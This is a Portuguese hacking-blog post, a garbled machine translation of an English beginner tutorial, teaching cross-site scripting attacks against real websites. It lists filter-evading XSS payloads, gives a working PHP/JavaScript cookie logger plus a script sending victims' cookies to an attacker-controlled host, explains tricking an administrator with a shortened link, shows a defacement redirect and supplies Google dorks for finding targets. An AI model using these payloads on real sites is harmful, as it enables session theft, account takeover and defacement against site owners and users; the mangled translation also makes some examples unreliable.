quarta-feira, 20 de junho de 2012

Tutorial XSS Injection ( Cookies ) – COMPLETO

twitter_xss_ie8 Olá amigos do INW, confiram este tutorial enviado por aratorny sobre XSS.

Primeiro de tudo, eu traduzi ele no google e mudei algumas coisas, mais acho que deu pra entender, até porquê, eu aprendi a fazer XSS assim.. Espero que gostem!.
Aqui está um outro tutorial escrito por XSS mim. Começarão aprendizagem de hackers comigo.
Vou tentar fazer isso o mais breve possível, abrangendo apenas o básico para que ele ajuda a noobs a entender ;p
Então vou começar como sempre
O que é XSS?
Aqui está o wikipedia diz:
Cross-site scripting (XSS) é um tipo de computador vulnerabilidade de segurança normalmente encontrados em aplicações web que permite que atacantes para injetar client-side script em páginas da Web vistos por outros usuários. Um cross-site scripting vulnerabilidade pode ser usada por crackers para contornar os controles de acesso, como a política de mesma origem. Cross-site scripting realizadas em sites responderam por aproximadamente 80,5% de todas as vulnerabilidades de segurança documentadas pela Symantec a partir de 2007. [1] O seu efeito pode variar de um incômodo pequeno para um risco de segurança significativo, dependendo da sensibilidade dos dados manipulados pelo o site vulnerável ea natureza de qualquer atenuação de segurança implementada pelo proprietário do site.
Ataque!
Assim, nesta seção iremos aprender como usar XSS para ganhar controle sobre alguns website.So isto é para um noob real, que não sei nada sobre isso Sorrindo
Assim como em todos os hackers outro, XSS também começa por encontrar uma vulnerability.But você pode precisar fazer várias coisas para saber se um site é realmente vulnerável.
Então, em primeiro lugar, lembre-se this.A site que tem algo como uma caixa de pesquisa, espaço de login ou qualquer coisa semelhante é mais vulnerável XSS.
Portanto, para este primeiro ataque, nós estaremos usando uma caixa de pesquisa.
Então coloque este pequeno pedaço de código na caixa e pressione Enter Sorridente
Citação:
1
<script>alert("XSS")</script>
Agora você pode ver seu script de uma forma muito simples, portanto, incluída no script script tags.The é alertar uma mensagem simples, XSS.Now se uma pequena caixa pop uped dizendo XSS, parabéns! Seu site é vulnerável! Agora, se nada aparecer, isso significa que o site tem filtrado filtro it.This pode ser facilmente contornado por us.There muitos tipos de filtros e na maioria das vezes, o seu bloqueio da caixa de alerta.
Assim, em seu código, você encerrou a mensagem “XSS” em dupla quotes.So o sistema sabe que você está tentando XSS hackers desde que foi fechado em quotes.So dupla temos para criptografar a nossa mensagem para enganar o sistema inteligente?
Então, agora usamos uma função pouco chamado “String.fromCharCode” Então, o que isso faz é criptografar o nosso texto para linguagem ASCII .. Aqui está um exemplo de como parece.:
Citação:
String.fromCharCode(88,83,83)
Agora 88,83,83 são valores ASCII para XS S.Check este link para saber a tabela de conversão.
http://www.ascii.cl/
Não é necessário que Toungee
Então, agora digite o código recém-formatado na caixa de busca e aperte enter.
Citação:
1
<script>alert(String.fromCharCode(88,83,83))</script>
A coisa especial é que você não precisa usar aspas, neste caso, uma vez que esta função é usada Agora você deve obter a caixa pop-up na maioria dos casos.
Else há muitos pedaços de código outros que você pode inserir yourself.You pode fazer códigos e introduza-o se você sabe alguma codificação de sorriso
Aqui são pedaços de código mais alguns que eu encontrei na net que você pode usar para fazer isso:
Citação:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83)) </script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83) )</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
Essas consultas só deve ser capaz para você cortar qualquer tipo de websites.Even dos maiores sites pode estar tendo algumas vulnerabilidades XSS que você pode encontrar com estes idiotas.
Avançado XSS
Agora vamos aprender a usar essas coisas para atacar websites.Keep em mente que isso é completamente ilegal e você pode ser pego e pode ser cobrado por crime para fazer this.So tomar precauções sempre.
Roubar Cookies
Então, agora vamos usar o método Cookies roubar para fazer o attack.It é um tipo especial de biscoito / logger que registra o usuário que acessa esse page.So existem muitas maneiras de fazer isso, mas aqui é um método fácil.
Portanto, neste método, você precisará configurar um website.So ir para algum sites.I hospedagem preferem http://www.000webhost.com e criar uma conta no que website.Go para gerenciador de arquivos e criar um novo arquivo de texto em it.Name ele qualquer coisa como cookielog.txt ou algo parecido t that.Don ‘enter nada para ele it.Leave blank.Create outro arquivo txt e nomeie-o algo cookiellogger.txt.So exemplo different.For iremos adicionar algum código em -lo para que ele possa enviar logs para o file.So cookielog.txt abrir o arquivo de texto 2 e digite este código:
Citação:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";
var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for
return encoded;
};
cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);
< ?php
}
?>
Então esse é o script.Agora no cookielogger precisamos mandar essa mensagem para o administrador do site website.So alvo mais provavelmente o administrador não vai olhar it.Since temos que convencê-lo, vamos encurtar o url.Go para http:// www.spam.com/ e encurtar a sua URL.And já que queremos adicionar vulnerabilidade, precisamos adicionar algum código também. Então, adicione este código após a URL e reduzi-lo.
Citação:
1
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
Envie o link para o administrador e esperar para que ele clique it.You precisa ter sorte para o administrador clicar nele Uma vez que ele clicou, você terá a cookie.Now você pode usar algumas ferramentas como o addon gerenciador de cookies que você começa para Mozilla e jogar em torno dele. Sua addon muito bom e realmente ajuda a fazer um monte!
Deface
Então agora podemos desfigurar a website.Isso é, a publicação que você ganhou controle sobre o site fazendo uma página de desfigurar ou something.Now você precisa usar um pequeno script para redirecionar todo mundo que visita o site para a página de desfigurar.
Citação:
1
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
Substitua a sintaxe com a sua página desfigurar site.
Ignorando o filtro XSS
Assim, na maioria das vezes, o simples script não vai dar o pop-up message.It costuma ignorar o filter.So você tem que usar algum outro methods.I irá discutir alguns deles abaixo.
Hex Bypass ( Ignorar )
Com personagens bloqueados como>, <, e /, é muito difícil de executar uma consulta de XSS. Não se preocupe, há sempre uma solução Sorrindo Você pode mudar seus personagens, em hexadecimal. A Hex de um determinado personagem, é basicamente o personagem, mas em um formato diferente. Estes devem ajudá-lo:
> =% 3c
<=% 3c
/ =% 2f
Ignorando ASCII
Com uma criptografia ASCII, podemos usar o caractere "Qual é bloqueado um pouco Este é um dos o filtro XSS mais comum ignora de todos os tempos Um script que você precisa para criptografar, ficaria assim...:
Citação:
1
<script>alert("XSS")</script>
E esta deve estar funcionando:
Citação:
1
<script> alert ("XSS") </ script>
Para criptografar a sua pequena parte de um script, vá a este site: http://www.wocares.com/noquote.php
Ignorando Case-Sensitive
Este tipo de cirurgia raramente funciona, mas vale sempre a pena um tiro. Alguns filtros são definidos no local para detectar determinadas seqüências, no entanto, as cordas do filtro que são bloqueados são caso sensível. Então, tudo o que precisamos fazer é executar um script, com diferentes tamanhos de caracteres. Este desvio, ficaria assim:
Citação:
1
<script> alert ("XSS") </ script>
Você também pode misturar isso com criptografia ASCII se você gosta. Este tipo de cirurgia só funciona em filtros realmente estúpido, ou aqueles realmente muito velho.
E por último, eu estou dando alguns idiotas XSS que você pode experimentar no Google.
Citação:
1
2
3
4
5
6
inurl: search.php?
inurl: find.php?
inurl: search.html
inurl: find.html
inurl: Search.aspx
inurl: find.aspx
Obrigado por ler...
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86